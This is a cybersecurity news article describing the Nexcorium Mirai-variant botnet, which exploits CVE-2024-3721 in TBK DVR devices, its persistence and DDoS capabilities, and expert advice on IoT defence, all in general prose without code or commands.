A newly identified malware campaign has been observed exploiting a command injection flaw in digital video recorder (DVR) devices to deploy a Mirai-based botnet, according to analysis by FortiGuard Labs.
The activity targets CVE-2024-3721 in TBK DVR systems, enabling attackers to gain access and install a multi-architecture Mirai variant malware known as Nexcorium.
Fortinet researchers found that the attack begins with crafted requests abusing vulnerable parameters to execute a downloader script. This script retrieves malicious binaries tailored for different Linux environments, including ARM, MIPS and x86-64 systems, then executes them with elevated permissions.
Evidence within the attack traffic includes a custom HTTP header referencing “Nexus Team,” which analysts believe may point to a previously untracked threat actor. Upon execution, the malware announces control of the compromised system, signaling a successful infection.
“The Nexcorium campaign is a precise illustration of why automated scanning alone cannot close the exposure gap,” Trey Ford, chief strategy and trust officer at Bugcrowd, said. “Machine speed analysis tells you a vulnerability exists, but human researcher depth tells you how an adversary will chain it, weaponize it and sustain access long after the initial alert fires.”
Multi-Stage Infection and Persistence Techniques
Once deployed, Nexcorium initializes a configuration set hidden through XOR encoding. This includes command-and-control (C2) server details, attack instructions and a built-in credential list used for brute-force activity.
The malware closely mirrors traditional Mirai architecture, with modules dedicated to scanning, persistence and attack execution.
The scanner component attempts to propagate by exploiting known weaknesses and leveraging default credentials over Telnet connections. Among its embedded exploits is CVE-2017-17215, a vulnerability affecting Huawei routers, which expands its reach beyond the initial DVR targets.
In practice, the malware combines several techniques to scale infections. It exploits CVE-2024-3721 for initial access, uses default credentials to move laterally, targets multiple CPU architectures and incorporates legacy exploits to broaden its reach across vulnerable devices.
Persistence is achieved through several mechanisms. The malware modifies system initialization files, creates startup scripts and registers system services to ensure execution after reboot. It also schedules recurring tasks via cron jobs, allowing it to survive system restarts and maintain long-term access.
Read more on IoT botnet threats: New Mirai Botnet Exploits Zero-Days in Routers and Smart Devices
DDoS Capabilities and Operational Impact
After establishing persistence, Nexcorium connects to a remote command server to receive instructions.
It supports a wide range of distributed denial-of-service (DoS) methods, including UDP floods, TCP SYN floods and application-layer attacks such as SMTP flooding.
Attack commands are dynamically issued by the C2 infrastructure, enabling coordinated campaigns across infected devices. The malware can also terminate ongoing attacks or remove itself when instructed, suggesting centralized control over botnet operations.
“Enterprises have had their fleets of IoT and OT devices used by Mirai and its variants for some time, particularly for DDoS attacks,” John Gallagher, vice president of Viakoo Labs at IoT security firm Viakoo, said. “Until more action is taken by enterprises to maintain cyber hygiene on IoT devices, this will continue because of the ease of infection and ability to move laterally.”
Security teams should focus on foundational controls for IoT environments, Gallagher said, noting that traditional agent-based tools are often ineffective.
“IoT devices don’t allow agents to be hosted on them, so only agentless discovery and remediation solutions can apply,” he added. “Other best practices for IoT security include automated methods for password and certificate management as well as firmware management.”
